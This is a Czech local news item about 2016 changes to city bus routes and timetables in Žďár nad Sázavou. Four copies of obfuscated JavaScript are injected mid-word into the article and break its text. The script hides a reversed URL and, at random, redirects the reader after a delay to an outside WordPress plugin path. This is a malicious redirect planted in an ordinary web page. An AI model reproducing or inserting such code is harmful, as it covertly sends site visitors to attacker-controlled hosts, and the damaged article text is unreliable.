Rainbow page separator

V prosinci dojde k malým změnám v MHD, k velkým až v červenci

Pátek, 25. listopadu 2016

Žďár nad Sázavou / Se změnami jízdních řádů městské hromadné dopravy počítají od 11. prosince ve Žďáře. Týkají se zejména přepravy zaměstnanců do firmy Tokoz, aby lépe stihli začátek pracovní doby, a rovněž zlepšení dostupnosti hřbi["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tova na Zelené hoře. Nadcházející menší úpravy budou navazovat na změnu ve vedení, značení i časování linek MHD, k čemuž dojde od července příštího roku. S tím je spojeno i zavedení městské hromadné dopravy do čtvrti Klafar. Plánovaných změnám v MHD předcházelo veřejné šetření mezi obyvateli Žďáru, na základě jehož výsledků odborníci navrhli optimální složení a trasování au["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tobusových linek. Z průzkumu například vyplynulo, že největší přepravní potenciál je mezi nádražím a průmyslovou zónou, dále mezi nádražím a Klafarem či nádražím a Libušínem, respektive mezi zastávkou u Žďasu a Libušínem či Stalingradem. Mezi nejméně využívané zdroje nebo cíle cest patří Dagmarky, Pilská nádrž a Nádražní ulice.